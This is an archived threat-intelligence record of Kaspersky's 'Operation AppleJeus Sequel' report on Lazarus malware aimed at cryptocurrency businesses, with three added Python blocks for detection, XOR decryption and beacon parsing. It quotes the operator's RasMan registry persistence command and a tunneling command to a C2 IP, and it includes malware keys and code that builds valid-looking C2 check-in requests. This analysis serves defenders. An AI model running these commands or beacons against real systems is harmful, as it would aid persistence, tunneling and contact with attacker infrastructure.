{
	"id": "f7c56089-986e-463c-9ab5-ff9b7269c708",
	"created_at": "2026-04-06T00:11:11.20318Z",
	"updated_at": "2026-04-10T03:38:20.018143Z",
	"deleted_at": null,
	"sha1_hash": "ce054cf44ff8f515508a7f77b72ea6edd24fa5a1",
	"title": "Operation AppleJeus Sequel",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 5176169,
	"plain_text": "Operation AppleJeus Sequel\r\nBy GReAT\r\nPublished: 2020-01-08 · Archived: 2026-04-05 16:55:15 UTC\r\nThe Lazarus group is currently one of the most active and prolific APT actors. In 2018, Kaspersky published a report on one\r\nof their campaigns, named Operation AppleJeus. Notably, this operation marked the first time Lazarus had targeted macOS\r\nusers, with the group inventing a fake company in order to deliver their manipulated application and exploit the high level of\r\ntrust among potential victims. As a result of our ongoing efforts, we identified significant changes to the group’s attack\r\nmethodology. To attack macOS users, the Lazarus group has developed homemade macOS malware, and added an\r\nauthentication mechanism to deliver the next stage payload very carefully, as well as loading the next-stage payload without\r\ntouching the disk. In addition, to attack Windows users, they have elaborated a multi-stage infection procedure, and\r\nsignificantly changed the final payload. We assess that the Lazarus group has been more careful in its attacks following the\r\nrelease of Operation AppleJeus and they have employed a number of methods to avoid being detected.\r\nFor more information, please contact: intelreports@kaspersky.com\r\nLife after Operation AppleJeus\r\nAfter releasing Operation AppleJeus, the Lazarus group continued to use a similar modus operandi in order to compromise\r\ncryptocurrency businesses. We found more macOS malware similar to that used in the original Operation AppleJeus case.\r\nThis macOS malware used public source code in order to build crafted macOS installers. 
The malware authors used QtBitcoinTrader, developed by Centrabit.\r\n                        Original AppleJeus                   WbBot case                            MacInstaller case\r\nDMG file hash           48ded52752de9f9b73c6bf9ae81cb429     3efeccfc6daf0bf99dcb36f247364052      c2ffbf7f2f98c73b98198b4937119a18\r\nPKG file hash           dab34d94ca08ba5b25edadfe67ae4607     cb56955b70c87767dee81e23503086c3      8b4c532f10603a8e199aa4281384764e\r\nPKG file name           CelasTradePro.pkg                    WbBot.pkg                             BitcoinTrader.pkg\r\nPackaging time          2018-07-12 14:09:33                  2018-11-05 06:11:38                   2018-12-19 00:15:19\r\nMalicious mach-o hash   aeee54a81032a6321a39566f96c822f5     b63e8d4277b190e2e3f5236f07f89eee      bb04d77bda3ae9c9c3b6347f7aef19ac\r\nC2 server               www.celasllc[.]com/checkupdate.php   https://www.wb-bot[.]org/certpkg.php  https://www.wb-bot[.]org/certpkg.php\r\nXOR key                 Moz\u0026Wie;#t/6T!2y                     6E^uAVd-^yYkB-XG                      6E^uAVd-^yYkB-XG\r\nRC4 key                 W29ab@ad%Df324V$Yd                   SkQpTUT8QEY\u0026Lg+BpB                    SkQpTUT8QEY\u0026Lg+BpB\r\n2nd payload path        /var/zdiffsec                        /var/pkglibcert                       /var/pkglibcert\r\n2nd payload argument    bf6a0c760cc642                       bf6a0c760cc642                        bf6a0c760cc642\r\nhttps://securelist.com/operation-applejeus-sequel/95596/\r\nPage 1 of 10\n\nThese three macOS installers use a similar post-install script to implant a mach-o payload, and pass the same command-line argument when executing the fetched second-stage payload. However, the group has started changing its macOS malware. We recognized a different type of macOS malware, MarkMakingBot.dmg (be37637d8f6c1fbe7f3ffc702afdfe1d), created on 2019-03-12. It doesn’t have an encryption/decryption routine for network communication. We speculate that this is an intermediate stage in significant changes to their macOS malware.\r\nChange of Windows malware\r\nDuring our ongoing tracking of this campaign, we found that one victim was compromised by Windows AppleJeus malware in March 2019. 
Unfortunately, we couldn’t identify the initial installer, but we established that the infection started from a malicious file named WFCUpdater.exe. At that time, the actor used a fake website: wfcwallet[.]com\r\nThe actor used a multi-stage infection like before, but the method was different. The infection started from .NET malware disguised as a WFC wallet updater (a9e960948fdac81579d3b752e49aceda). Upon execution, this .NET executable checks whether the command-line argument is “/Embedding” or not. This malware is responsible for decrypting the WFC.cfg file in the same folder with a hardcoded 20-byte XOR key (82 d7 ae 9b 36 7d fc ee 41 65 8f fa 74 cd 2c 62 b7 59 f5 62). While mimicking a wallet updater, it connects to the C2 addresses:\r\nwfcwallet.com (resolved IP: 108.174.195.134)\r\nwww.chainfun365.com (resolved IP: 23.254.217.53)\r\nAfter that, it carries out the malware operator’s commands in order to install the next-stage persistent payload. The actor delivered two more files into the victim’s system folder: rasext.dll and msctfp.dat. They used the RasMan (Remote Access Connection Manager) Windows service to register the next payload as a persistence mechanism: the DLL named by the DllName value under the service’s ThirdParty key is loaded by RasMan. After basic reconnaissance, the malware operator implanted the delivered payload manually using the following commands:\r\ncmd.exe /c dir rasext.dll\r\ncmd.exe /c dir msctfp.dat\r\ncmd.exe /c tasklist /svc | findstr RasMan\r\ncmd.exe /c reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\RasMan\\ThirdParty /v DllName /d rasext.dll /f\r\nIn order to establish remote tunneling, the actor delivered more tools, executing them with command-line parameters. Unfortunately, we have had no chance to obtain these files, but we speculate that Device.exe is responsible for opening port 6378, and that the CenterUpdater.exe tool was used to create a tunnel to a remote host. 
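The commands above are the whole Windows-side footprint of the WFCWallet case that a hunter can key on: a reg add that sets DllName under the RasMan ThirdParty key, a tasklist/findstr check for the RasMan service, and the Device.exe/CenterUpdater.exe pair that opens port 6378 and forwards it to the 104.168.167.16:443 C2 address the report lists. The Python below is an added example written for this page, not code from the report or from Kaspersky. The process-event field names (image, command_line) and the sample events are constructed; the registry check assumes that a clean Windows build sets no DllName under RasMan\ThirdParty, which should be confirmed against a known-good host before it is used for alerting.

```python
import re

# Constructed process-creation events shaped like the command lines the report
# quotes for the WFCWallet case. The field names are an assumption, not a
# format the report describes; the paths stand in for %APPDATA% and %SYSTEM%.
SAMPLE_EVENTS = [
    {'image': r'C:\Windows\System32\cmd.exe',
     'command_line': r'cmd.exe /c tasklist /svc | findstr RasMan'},
    {'image': r'C:\Windows\System32\cmd.exe',
     'command_line': r'cmd.exe /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet'
                     r'\services\RasMan\ThirdParty /v DllName /d rasext.dll /f'},
    {'image': r'C:\Users\victim\AppData\Roaming\Lenovo\devicecenter\Device.exe',
     'command_line': r'Device.exe 6378'},
    {'image': r'C:\Users\victim\AppData\Roaming\Lenovo\devicecenter\CenterUpdater.exe',
     'command_line': r'CenterUpdater.exe 127.0.0.1 6378 104.168.167.16 443'},
    {'image': r'C:\Windows\System32\cmd.exe',                      # benign control
     'command_line': r'cmd.exe /c dir C:\Users\victim\Documents'},
]

# Any writer touching DllName under the RasMan ThirdParty key (the reg add above).
RASMAN_THIRDPARTY = re.compile(r'services\\rasman\\thirdparty\b.*\bdllname\b', re.IGNORECASE)
# "<tool> 127.0.0.1 <local port> <remote ip> <remote port>": the CenterUpdater.exe shape.
TUNNEL_ARGS = re.compile(r'\b127\.0\.0\.1\s+(\d{1,5})\s+(\d{1,3}(?:\.\d{1,3}){3})\s+(\d{1,5})\b')
KNOWN_C2 = {'104.168.167.16'}              # from the report's IoC list
TOOL_NAMES = {'device.exe', 'centerupdater.exe'}

def hunt(event):
    '''Return the findings (strings) for one process-creation event.'''
    cmd = event.get('command_line', '')
    image = event.get('image', '')
    base = image.rsplit('\\', 1)[-1].lower()
    findings = []
    if RASMAN_THIRDPARTY.search(cmd):
        findings.append('persistence: RasMan ThirdParty DllName written: ' + cmd)
    elif 'tasklist' in cmd.lower() and 'rasman' in cmd.lower():
        findings.append('recon: RasMan service enumerated: ' + cmd)
    m = TUNNEL_ARGS.search(cmd)
    if m:
        lport, rhost, rport = m.groups()
        tag = 'known AppleJeus C2' if rhost in KNOWN_C2 else 'unlisted host'
        findings.append('tunnel: 127.0.0.1:%s -> %s:%s (%s)' % (lport, rhost, rport, tag))
    if base in TOOL_NAMES and 'devicecenter' in image.lower():
        findings.append('tool path: ' + image)
    return findings

def hunt_all(events):
    '''(command line, findings) for every event that produced at least one finding.'''
    hits = []
    for event in events:
        found = hunt(event)
        if found:
            hits.append((event.get('command_line', ''), found))
    return hits

def check_rasman_thirdparty(values):
    '''Registry-state check over the values of the RasMan ThirdParty key
    (HKLM, SYSTEM, CurrentControlSet, services, RasMan, ThirdParty), passed in as
    {value name: data}; collecting them is left to your hive tooling.
    Assumption, to confirm on a known-good host: a clean build sets no DllName
    here, so any DllName present is worth a look.'''
    dll = values.get('DllName')
    if dll is None:
        return None
    return 'RasMan ThirdParty DllName=%s' % dll

if __name__ == '__main__':
    for cmd, found in hunt_all(SAMPLE_EVENTS):
        print(cmd)
        for f in found:
            print('   ', f)
    print(check_rasman_thirdparty({'DllName': 'rasext.dll'}))
```

The command-line rules catch the operator's interactive session; pair them with a registry-modification source (for example Sysmon event 13 on the same key) so that a payload that writes DllName through the API rather than reg.exe is not missed.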
Note that the 104.168.167.16 server is used as a C2 server. The server hosting the fake website for the UnionCryptoTrader case is described later.\r\nPort opener:\r\n%APPDATA%\\Lenovo\\devicecenter\\Device.exe 6378\r\nTunneling tool:\r\n%APPDATA%\\Lenovo\\devicecenter\\CenterUpdater.exe 127.0.0.1 6378 104.168.167.16 443\r\nChange of macOS malware\r\nJMTTrading case\r\nWhile tracking this campaign, we identified macOS malware that had been modified much more heavily. At the time, the attacker called their fake website and application JMTTrading. Other researchers and security vendors found it too, and published IoCs with abundant technical details. Malware Hunter Team tweeted about this malicious application, Vitali Kremez published a blog about the Windows version of the malware, and Objective-See published details about the macOS malware. We believe these reports are sufficient to understand the technical side. Here, we would like to highlight what’s different about this attack.\r\nThe actor used GitHub in order to host their malicious applications.\r\nThe malware author used Objective-C instead of the Qt framework in their macOS malware.\r\nThe malware implemented a simple backdoor function in the macOS executable.\r\nThe malware encrypted/decrypted with a 16-byte XOR key (X,%`PMk–Jj8s+6=), similar to the previous case.\r\nThe Windows version of the malware used ADVobfuscator, a compile-time obfuscator, in order to hide its code.\r\nThe post-install script of the macOS malware differed significantly from the previous version.\r\nUnionCryptoTrader case\r\nWe also identified another attack targeting macOS that took place very recently. The malicious application name in this case is UnionCryptoTrader. After we compiled a threat intelligence report for our customers, one security researcher (@dineshdina04) discovered an identical case, and Objective-See published a very detailed blog on the macOS malware used in this attack. 
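The JMTTrading bullet above and the WFCWallet section earlier both describe data protected with a short repeating XOR key (16 bytes and 20 bytes respectively). The Python below is an added example for this page, not code from the report, from Kaspersky or from the malware: it implements repeating-key XOR with the 20-byte WFC.cfg key the report prints, a printable-text check for triaging candidate keys, and, going one step beyond the report, known-plaintext recovery of a repeating key when its period is known or guessed (a URL prefix is a workable crib for configs like these). The sample configuration is constructed; the report gives the C2 domains, not the file's layout.

```python
WFC_CFG_KEY = bytes.fromhex('82d7ae9b367dfcee41658ffa74cd2c62b759f562')  # 20-byte key from the report

def xor_repeating(data, key):
    '''XOR each byte with the key byte at the same offset modulo the key length.
    XOR is its own inverse, so the same call encrypts and decrypts.'''
    if not key:
        raise ValueError('empty key')
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def printable_ratio(data):
    '''Fraction of bytes that are printable ASCII, tab, CR or LF.'''
    if not data:
        return 0.0
    return sum(1 for b in data if 32 <= b < 127 or b in (9, 10, 13)) / len(data)

def try_key(blob, key, threshold=0.9):
    '''Decrypt with a candidate key; the flag says whether the result reads as text.
    The threshold is a triage heuristic, not a proof that the key is right.'''
    plain = xor_repeating(blob, key)
    return plain, printable_ratio(plain) >= threshold

def recover_key(blob, crib, key_len, offset=0):
    '''Known-plaintext recovery for a repeating key of length key_len: if the
    plaintext at offset is known for at least key_len bytes, each key byte is
    ciphertext XOR plaintext, placed at its position modulo the key period.'''
    if len(crib) < key_len:
        raise ValueError('crib must cover at least one full key period')
    if offset + key_len > len(blob):
        raise ValueError('crib runs past the end of the ciphertext')
    key = bytearray(key_len)
    for i in range(key_len):
        key[(offset + i) % key_len] = blob[offset + i] ^ crib[i]
    return bytes(key)

# Constructed stand-in for a WFC.cfg, encrypted with the published key. The
# report gives the two C2 domains, not the file layout, so the content is a guess.
SAMPLE_CONFIG = b'https://wfcwallet.com/\nhttps://www.chainfun365.com/\n'
SAMPLE_BLOB = xor_repeating(SAMPLE_CONFIG, WFC_CFG_KEY)

if __name__ == '__main__':
    plain, looks_like_text = try_key(SAMPLE_BLOB, WFC_CFG_KEY)
    print(looks_like_text, plain.decode())
    # Recover the key from the second URL alone (offset 23), as you would when
    # only part of the plaintext is known.
    print(recover_key(SAMPLE_BLOB, SAMPLE_CONFIG[23:43], 20, 23).hex())
```

When the key length is not known, run recover_key for each candidate period and keep the one whose full decryption passes try_key; with a period of 20 a crib shorter than 20 bytes leaves some key bytes undetermined, which is why the function insists on a crib at least one period long.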
The Objective-See blog goes into sufficient detail to explain the malware’s functionality, so we will just summarize the attack:\r\nThe post-install script is identical to that used in the JMTTrading case.\r\nThe malware author used Swift to develop this macOS malware.\r\nThe malware author changed the method for collecting information from the infected system.\r\nThe malware now authenticates its request for the second-stage payload using auth_signature and auth_timestamp parameters. It takes the current system time, combines it with the hardcoded string “12GWAPCT1F0I1S14” and computes the MD5 hash of the combined string. This hash is sent as the auth_signature parameter and the current time as the auth_timestamp parameter, which lets the malware operator reproduce auth_signature from auth_timestamp and verify the request on the C2 server side. Because the string is hardcoded in the binary, this filters out unsolicited requests (scanners, sandboxes replaying captured traffic) rather than providing real authentication: anyone holding the sample can produce a valid pair.\r\nThe malware loads the next-stage payload without touching the disk.\r\nWindows version of UnionCryptoTrader\r\nWe also found a Windows version of UnionCryptoTrader (0f03ec3487578cef2398b5b732631fec). It was executed from the Telegram messenger download folder:\r\nC:\\Users\\[user name]\\Downloads\\Telegram Desktop\\UnionCryptoTraderSetup.exe\r\nWe also found the actor’s Telegram group on their fake website. Based on these, we assess with high confidence that the actor delivered the manipulated installer using the Telegram messenger. Unfortunately, we can’t get all the related files as some payloads were only executed in memory. However, we can reassemble the whole infection procedure based on our telemetry. 
The overall infection procedure was very similar to the WFCWallet case, but with an added injection procedure, and they only used the final backdoor payload instead of using a tunneling tool.\r\nThe UnionCryptoTrader Windows version displays a window showing a price chart for several cryptocurrency exchanges.\r\nThe Windows version of the UnionCryptoTrader updater (629b9de3e4b84b4a0aa605a3e9471b31) has similar functionality to the macOS version. According to the build path (Z:\\Loader\\x64\\Release\\WinloaderExe.pdb), the malware author called this malware a loader. Upon launch, the malware retrieves the victim’s basic system information and sends it in the following HTTP POST format, as is the case with the macOS malware.\r\nPOST /update HTTP/1.1\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36\r\nauth_timestamp: [Current time]\r\nauth_signature: [Generated MD5 value based on current time]\r\nContent-Length: 110\r\nHost: unioncrypto.vip\r\n\r\nrlz=[BIOS serial number]\u0026ei=[OS version] ([build number])\u0026act=check\r\nIf the response code from the C2 server is 200, the malware decrypts the payload and loads it in memory. Finally, the malware sends the act=done value and the return code. The next-stage payload (e1953fa319cc11c2f003ad0542bca822), downloaded by this loader, is similar to the .NET downloader in the WFCWallet case. This malware is responsible for decrypting the Adobe.icx file in the same folder. It injects the next payload into the Internet Explorer process, and the tainted iexplore.exe process carries out the attacker’s commands. The final payload (dd03c6eb62c9bf9adaf831f1d7adcbab) is implanted manually as in the WFCWallet case. 
This final payload was designed to run only on certain systems. It seems that the malware authors produced and delivered malware that only works on specific systems, based on previously collected information. The malware checks the infected system’s information and compares it to a given value. It seems the actor wants to execute the final payload very carefully, and wants to evade behavior-based detection solutions.\r\nThis Windows malware loads the encrypted msctfp.dat file from a system folder, reads each configuration value, and then executes an additional command based on the contents of this file. When the malware communicates with the C2 server, it uses a POST request with several predefined headers.\r\nPOST /[C2 script URL] HTTP/1.1\r\nAccept-Encoding: gzip, deflate, br\r\nAccept-Language: en-US,en;q=0.9\r\nContent-Type: application/x-www-form-urlencoded\r\nConnection: keep-alive (or Connection: close)\r\nUser-Agent: [User-agent of current system]\r\nHost: unioncrypto.vip\r\nFor the initial communication, the malware first sends these parameters:\r\ncgu: 64-bit hex value from configuration\r\naip: MD5 hash value from configuration\r\nsv: hardcoded value (1)\r\nIf the response code from the C2 server is 200, the malware sends the next POST request with encrypted data and a random value. The malware operator probably used the random value to identify each victim and verify the POST request.\r\nimp: Randomly generated value\r\ndsh: XORed value of imp\r\nhb_tp: XORed value (key: 0x67BF32) of imp\r\nhb_dl: Encrypted data to send to C2 server\r\nct: hardcoded value (1)\r\nFinally, the malware downloads the next-stage payload, decrypts it and possibly executes it with the Print parameter. We speculate that a DLL-type payload is downloaded and its Print export function called for further infection. 
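To make the beacon formats concrete for anyone validating proxy logs or standing up a sinkhole, the Python below is an added example for this page, not code from the report, from Kaspersky or from the malware. It reproduces the auth_timestamp/auth_signature pair of the UnionCryptoTrader updater (assuming the timestamp is Unix seconds as a decimal string and is placed in front of the hardcoded string before MD5; the report says only that the two are combined), parses a raw HTTP POST, and recognises the three request shapes the report lists: the updater check-in with rlz/ei/act, the final payload's cgu/aip/sv initial beacon, and its imp/dsh/hb_tp/hb_dl/ct data beacon. The sample requests are constructed with placeholder values.

```python
import hashlib
import time
from urllib.parse import parse_qs

AUTH_SALT = '12GWAPCT1F0I1S14'   # hardcoded string quoted in the report

def auth_pair(timestamp=None):
    '''Client side. Assumption: the timestamp is Unix seconds as a decimal
    string and is concatenated in front of the hardcoded string before hashing.'''
    ts = str(int(time.time()) if timestamp is None else int(timestamp))
    sig = hashlib.md5((ts + AUTH_SALT).encode()).hexdigest()
    return ts, sig

def signature_valid(ts, sig):
    '''Server side, or an analyst replaying a captured request: recompute and compare.
    A match proves only that the sender holds the hardcoded string, i.e. the sample.'''
    return hashlib.md5((str(ts) + AUTH_SALT).encode()).hexdigest() == sig.strip().lower()

def parse_http_request(raw):
    '''Split a raw HTTP/1.1 request into (request line, {lower-cased header: value}, body).'''
    head, _, body = raw.partition('\r\n\r\n')
    lines = head.split('\r\n')
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(':')
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body

def classify_beacon(raw):
    '''Match the POST shapes described in the report; returns a label or None.'''
    request_line, headers, body = parse_http_request(raw)
    if not request_line.startswith('POST '):
        return None
    fields = {k: v[0] for k, v in parse_qs(body).items()}
    if 'auth_timestamp' in headers and 'auth_signature' in headers and {'rlz', 'ei', 'act'}.issubset(fields):
        ok = signature_valid(headers['auth_timestamp'], headers['auth_signature'])
        return 'updater check-in, signature %s' % ('reproducible' if ok else 'not reproducible')
    if {'cgu', 'aip', 'sv'}.issubset(fields):
        return 'final payload: initial beacon'
    if {'imp', 'dsh', 'hb_tp', 'hb_dl', 'ct'}.issubset(fields):
        return 'final payload: data beacon'
    return None

def build_checkin(timestamp, serial='SERIAL0000', os_version='Windows 10 (18362)'):
    '''Constructed request in the shape the report lists; the values are placeholders.'''
    ts, sig = auth_pair(timestamp)
    body = 'rlz=%s&ei=%s&act=check' % (serial, os_version)
    return ('POST /update HTTP/1.1\r\n'
            'Content-Type: application/x-www-form-urlencoded\r\n'
            'auth_timestamp: %s\r\n'
            'auth_signature: %s\r\n'
            'Content-Length: %d\r\n'
            'Host: unioncrypto.vip\r\n'
            '\r\n%s' % (ts, sig, len(body), body))

if __name__ == '__main__':
    good = build_checkin(1577836800)
    print(classify_beacon(good))
    # A replayed request with the timestamp edited no longer matches its signature.
    print(classify_beacon(good.replace('auth_timestamp: 1577836800', 'auth_timestamp: 1577836899')))
```

A request whose signature reproduces under this function is a strong AppleJeus indicator regardless of destination host, since the constant is specific to the sample; one that does not reproduce may still be the same family with a different constant, so treat the field names as the primary match and the signature check as confirmation.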
We can’t get hold of the final payload that’s executed in memory, but we believe it is backdoor-type malware ultimately used to control the infected victim.\r\nInfrastructure\r\nWe found several fake websites that were still online when we were investigating the group’s infrastructure. They created fake cryptocurrency-themed websites, but they were far from perfect and most of the links didn’t work.\r\nWe found an identical Cyptian web template on the internet. We speculate that the actor used free web templates like this to build their fake websites. Moreover, there is a Telegram address (@cyptian) on the Cyptian website. As we mentioned previously, the actor delivered a manipulated application via Telegram messenger. This Telegram address was still alive when we investigated, but there was no more activity at that time. According to the chat log, the group was created on December 17, 2018, and some accounts had already been deleted.\r\nConclusion\r\nWe were able to identify several victims in this Operation AppleJeus sequel. Victims were recorded in the UK, Poland, Russia and China. Moreover, we were able to confirm that several of the victims are linked to cryptocurrency business entities.\r\nThe actor altered their macOS and Windows malware considerably, adding an authentication mechanism in the macOS downloader and changing the macOS development framework. The binary infection procedure on Windows differed from the previous case. They also changed the final Windows payload significantly from the well-known Fallchill malware used in the previous attack. 
We believe the Lazarus group’s continuous attacks for financial gain are unlikely to stop anytime soon.\r\nSince the initial appearance of Operation AppleJeus, we can see that over time the authors have changed their modus operandi considerably. We assume this kind of attack on cryptocurrency businesses will continue and become more sophisticated.\r\nAppendix I – Indicators of Compromise\r\nFile Hashes (malicious documents, Trojans, emails, decoys)\r\nmacOS malware\r\nc2ffbf7f2f98c73b98198b4937119a18 MacInstaller.dmg\r\n8b4c532f10603a8e199aa4281384764e BitcoinTrader.pkg\r\nbb04d77bda3ae9c9c3b6347f7aef19ac .loader\r\n3efeccfc6daf0bf99dcb36f247364052 4_5983241673595946132.dmg\r\ncb56955b70c87767dee81e23503086c3 WbBot.pkg\r\nb63e8d4277b190e2e3f5236f07f89eee .loader\r\nbe37637d8f6c1fbe7f3ffc702afdfe1d MarkMakingBot.dmg\r\nbb66ab2db0bad88ac6b829085164cbbb BitcoinTrader.pkg\r\n267a64ed23336b4a3315550c74803611 .loader\r\n6588d262529dc372c400bef8478c2eec UnionCryptoTrader.dmg\r\n55ec67fa6572e65eae822c0b90dc8216 UnionCryptoTrader.pkg\r\nda17802bc8d3eca26b7752e93f33034b .unioncryptoupdater\r\n39cdf04be2ed479e0b4489ff37f95bbe JMTTrader_Mac.dmg\r\ne35b15b2c8bb9eda8bc4021accf7038d JMTTrader.pkg\r\n6058368894f25b7bc8dd53d3a82d9146 .CrashReporter\r\nWindows malware\r\na9e960948fdac81579d3b752e49aceda WFCUpdater.exe\r\n24b3614d5c5e53e40b42b4e057001770 UnionCryptoTraderSetup.exe\r\n629b9de3e4b84b4a0aa605a3e9471b31 UnionCryptoUpdater.exe\r\ne1953fa319cc11c2f003ad0542bca822 AdobeUpdator.exe, AdobeARM.exe\r\nf221349437f2f6707ecb2a75c3f39145 rasext.dll\r\n055829e7600dbdae9f381f83f8e4ff36 UnionCryptoTraderSetup.exe\r\nf051a18f79736799ac66f4ef7b28594b Unistore.exe\r\nFile 
paths\r\n%SYSTEM%\\system32\\rasext.dll\r\n%SYSTEM%\\system32\\msctfp.dat\r\n%APPDATA%\\Lenovo\\devicecenter\\Device.exe\r\n%APPDATA%\\Lenovo\\devicecenter\\CenterUpdater.exe\r\n%APPDATA%\\Local\\unioncryptotrader\\UnionCryptoUpdater.exe\r\n%APPDATA%\\adobe\\AdobeUpdator.exe\r\nC:\\Programdata\\adobe\\adobeupdator.exe\r\n%AppData%\\Local\\Comms\\Unistore.exe\r\nDomains and IPs\r\nDomains\r\nwww.wb-bot.org\r\nwww.jmttrading.org\r\ncyptian.com\r\nbeastgoc.com\r\nwww.private-kurier.com\r\nwww.wb-invest.net\r\nwfcwallet.com\r\nchainfun365.com\r\nwww.buckfast-zucht.de\r\ninvesuccess.com\r\nprivate-kurier.com\r\naeroplans.info\r\nmydealoman.com\r\nunioncrypto.vip\r\nIPs\r\n104.168.167.16\r\n23.254.217.53\r\n185.243.115.17\r\n104.168.218.42\r\n95.213.232.170\r\n108.174.195.134\r\n185.228.83.32\r\n172.81.135.194\r\nURLs\r\nhttps://www.wb-bot[.]org/certpkg.php\r\nhttp://95.213.232[.]170/ProbActive/index.do\r\nhttp://beastgoc[.]com/grepmonux.php\r\nhttps://unioncrypto[.]vip/update\r\nSource: https://securelist.com/operation-applejeus-sequel/95596/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://securelist.com/operation-applejeus-sequel/95596/"
	],
	"report_names": [
		"95596"
	],
	"threat_actors": [
		{
			"id": "34eea331-d052-4096-ae03-a22f1d090bd4",
			"created_at": "2025-08-07T02:03:25.073494Z",
			"updated_at": "2026-04-10T02:00:03.709243Z",
			"deleted_at": null,
			"main_name": "NICKEL ACADEMY",
			"aliases": [
				"ATK3 ",
				"Black Artemis ",
				"COVELLITE ",
				"CTG-2460 ",
				"Citrine Sleet ",
				"Diamond Sleet ",
				"Guardians of Peace",
				"HIDDEN COBRA ",
				"High Anonymous",
				"Labyrinth Chollima ",
				"Lazarus Group ",
				"NNPT Group",
				"New Romanic Cyber Army Team",
				"Temp.Hermit ",
				"UNC577 ",
				"Who Am I?",
				"Whois Team",
				"ZINC "
			],
			"source_name": "Secureworks:NICKEL ACADEMY",
			"tools": [
				"Destover",
				"KorHigh",
				"Volgmer"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "544ecd2c-82c9-417c-9d98-d1ae395df964",
			"created_at": "2025-10-29T02:00:52.035025Z",
			"updated_at": "2026-04-10T02:00:05.408558Z",
			"deleted_at": null,
			"main_name": "AppleJeus",
			"aliases": [
				"AppleJeus",
				"Gleaming Pisces",
				"Citrine Sleet",
				"UNC1720",
				"UNC4736"
			],
			"source_name": "MITRE:AppleJeus",
			"tools": null,
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "732597b1-40a8-474c-88cc-eb8a421c29f1",
			"created_at": "2025-08-07T02:03:25.087732Z",
			"updated_at": "2026-04-10T02:00:03.776007Z",
			"deleted_at": null,
			"main_name": "NICKEL GLADSTONE",
			"aliases": [
				"APT38 ",
				"ATK 117 ",
				"Alluring Pisces ",
				"Black Alicanto ",
				"Bluenoroff ",
				"CTG-6459 ",
				"Citrine Sleet ",
				"HIDDEN COBRA ",
				"Lazarus Group",
				"Sapphire Sleet ",
				"Selective Pisces ",
				"Stardust Chollima ",
				"T-APT-15 ",
				"TA444 ",
				"TAG-71 "
			],
			"source_name": "Secureworks:NICKEL GLADSTONE",
			"tools": [
				"AlphaNC",
				"Bankshot",
				"CCGC_Proxy",
				"Ratankba",
				"RustBucket",
				"SUGARLOADER",
				"SwiftLoader",
				"Wcry"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a2b92056-9378-4749-926b-7e10c4500dac",
			"created_at": "2023-01-06T13:46:38.430595Z",
			"updated_at": "2026-04-10T02:00:02.971571Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Operation DarkSeoul",
				"Bureau 121",
				"Group 77",
				"APT38",
				"NICKEL GLADSTONE",
				"G0082",
				"COPERNICIUM",
				"Moonstone Sleet",
				"Operation GhostSecret",
				"APT 38",
				"Appleworm",
				"Unit 121",
				"ATK3",
				"G0032",
				"ATK117",
				"NewRomanic Cyber Army Team",
				"Nickel Academy",
				"Sapphire Sleet",
				"Lazarus group",
				"Hastati Group",
				"Subgroup: Bluenoroff",
				"Operation Troy",
				"Black Artemis",
				"Dark Seoul",
				"Andariel",
				"Labyrinth Chollima",
				"Operation AppleJeus",
				"COVELLITE",
				"Citrine Sleet",
				"DEV-0139",
				"DEV-1222",
				"Hidden Cobra",
				"Bluenoroff",
				"Stardust Chollima",
				"Whois Hacking Team",
				"Diamond Sleet",
				"TA404",
				"BeagleBoyz",
				"APT-C-26"
			],
			"source_name": "MISPGALAXY:Lazarus Group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "32a223a8-3c79-4146-87c5-8557d38662ae",
			"created_at": "2022-10-25T15:50:23.703698Z",
			"updated_at": "2026-04-10T02:00:05.261989Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Lazarus Group",
				"Labyrinth Chollima",
				"HIDDEN COBRA",
				"Guardians of Peace",
				"NICKEL ACADEMY",
				"Diamond Sleet"
			],
			"source_name": "MITRE:Lazarus Group",
			"tools": [
				"RawDisk",
				"Proxysvc",
				"BADCALL",
				"FALLCHILL",
				"WannaCry",
				"MagicRAT",
				"HOPLIGHT",
				"TYPEFRAME",
				"Dtrack",
				"HotCroissant",
				"HARDRAIN",
				"Dacls",
				"KEYMARBLE",
				"TAINTEDSCRIBE",
				"AuditCred",
				"netsh",
				"ECCENTRICBANDWAGON",
				"AppleJeus",
				"BLINDINGCAN",
				"ThreatNeedle",
				"Volgmer",
				"Cryptoistic",
				"RATANKBA",
				"Bankshot"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f32df445-9fb4-4234-99e0-3561f6498e4e",
			"created_at": "2022-10-25T16:07:23.756373Z",
			"updated_at": "2026-04-10T02:00:04.739611Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"APT-C-26",
				"ATK 3",
				"Appleworm",
				"Citrine Sleet",
				"DEV-0139",
				"Diamond Sleet",
				"G0032",
				"Gleaming Pisces",
				"Gods Apostles",
				"Gods Disciples",
				"Group 77",
				"Guardians of Peace",
				"Hastati Group",
				"Hidden Cobra",
				"ITG03",
				"Jade Sleet",
				"Labyrinth Chollima",
				"Lazarus Group",
				"NewRomanic Cyber Army Team",
				"Operation 99",
				"Operation AppleJeus",
				"Operation AppleJeus sequel",
				"Operation Blockbuster: Breach of Sony Pictures Entertainment",
				"Operation CryptoCore",
				"Operation Dream Job",
				"Operation Dream Magic",
				"Operation Flame",
				"Operation GhostSecret",
				"Operation In(ter)caption",
				"Operation LolZarus",
				"Operation Marstech Mayhem",
				"Operation No Pineapple!",
				"Operation North Star",
				"Operation Phantom Circuit",
				"Operation Sharpshooter",
